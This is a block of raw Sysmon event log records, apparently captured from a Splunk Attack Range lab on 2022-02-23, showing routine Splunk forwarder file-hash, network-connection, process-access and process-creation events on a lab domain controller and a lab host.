Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DBE61891430EB2C816A95378FD86A97,SHA256=04D4B03E72E8372B285E62B780B2872C0E0BA79811CA5012E2F06BF8DD6FF1CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297923Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:12.830{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF0206EFA63BA86DA89AC51E6BEB9BB6,SHA256=53714B7502A81CFE5949681C6D008A606505F4B631AEF8668846E84DE157306B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221809Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:12.602{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A05DFAC813E6ACE9BAFD3205600CEF1,SHA256=F9A5A0A81E465C4D2EF01E8BE4E7CCF552FC8058DE6A21D2E186E2FAA42E44F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297924Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:13.845{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDDB6A1662DF1FDA2CC30318773927AC,SHA256=17583B88EEDE4708B43C7316BA0B17E48C484E85C74DF85D2D6F67E36BA475BE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221811Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:10.492{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51675-false10.0.1.12-8000- 23542300x8000000000000000221810Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:13.618{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=296434E3569F2A27392D174331C0BA2B,SHA256=E127E2BA55098F9688A7B77BDF3C9EFC9BAF16B718B14EA06EE0AC8902A0DFF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221812Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:14.665{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F323402B47D96D5A6DEFBAEEF67A003F,SHA256=A15502A516235261E28CB1FE54EED2220673AEFE76164CD9C1A590F076202B08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297925Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:14.846{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A61FCDB9090C496D3645B68FEAF06D8,SHA256=4C98F8488689FC77CA08935F818354C865115F65C1DD14EB1C81EFD0C84EAD2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221813Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:15.868{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7516978697D8AAF7C5844941B2B670B2,SHA256=A6100E32825637B072D786718D795957C76E1E07DD0CC2366C9EE02715574EE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297926Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:15.862{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=894A24C0770A87B331425D682EF93FCF,SHA256=54410F762E75DF17A871CAF0D03FA264491E1C1AF60DA8E1DC55EB90098B94E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221814Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:16.899{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB5D2181D834157D648CF38F6BA15378,SHA256=779F79B73BB439216A67F4F1CAB15D513E09644A09B156EEBDDC341726DCA4A9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297928Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:14.605{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49495-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297927Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:16.877{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BEBD2715947547508412E4E43A549B7,SHA256=E831F4294F4BA52959DCA4D732536F2CE5BC81888302B2C8BBB9F5570998154C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221816Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:15.680{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51676-false10.0.1.12-8000- 23542300x8000000000000000221815Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:17.899{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63DB31423F662E5A72DCA883FA2EB3EE,SHA256=C0A598D5F7A6C2D7AB4A6EFA3D52485D08DD7247B6266305C99EBF8FC2E438B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297929Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:17.896{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44C0C6071F8868B2B686DD771EEA9202,SHA256=0B577A4F79EDA076820BA74E9C4ADD0985A57750027E9AA04EB20E0F0CE493A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221817Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:18.915{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1BC262CD8A63C47B04D76D0D347BDA7,SHA256=6A367B0D0886A2BFBB0DB7A39DB7CCC2AD2375F2A87B46C3DF09C5A673D1CD7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297930Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:18.930{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4831327B809869F99B41995614484FE,SHA256=5FDE1DB51297CB0DE1C096721A2116509BA273A79097B1679C3CBB914C149B04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297940Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:19.945{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D91BD59299D7B416744F309885EA2E84,SHA256=551FD75A946240CEF9CA4D1CBAE86088BF2AD40FF6A131B0FED07D7E438DA086,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221818Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:19.962{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59209AD95A954BE26A913CF7205990BB,SHA256=593BD0C7FB6643332866770F5F5BD84ED7E50CAF657439A25052A798325DE763,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297939Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:19.577{C8EA50B7-1837-6216-4107-000000003802}57766140C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297938Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:19.177{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1837-6216-4107-000000003802}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297937Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:19.177{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297936Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:19.177{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297935Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:19.177{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297934Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:19.177{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297933Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:19.177{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1837-6216-4107-000000003802}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297932Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:19.177{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1837-6216-4107-000000003802}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297931Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:19.178{C8EA50B7-1837-6216-4107-000000003802}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000297959Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:20.960{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A117F79F7111DBC37B0F043E56D3C32,SHA256=313DF070A4C946912C5502EF1458B7FB6B36B488785AC5841516EA1AD6DC62C5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297958Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:20.960{C8EA50B7-1838-6216-4307-000000003802}66726592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297957Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:20.729{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1838-6216-4307-000000003802}6672C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297956Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:20.729{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297955Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:20.729{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297954Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:20.729{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297953Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:20.729{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297952Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:20.729{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1838-6216-4307-000000003802}6672C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297951Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:20.729{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1838-6216-4307-000000003802}6672C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program 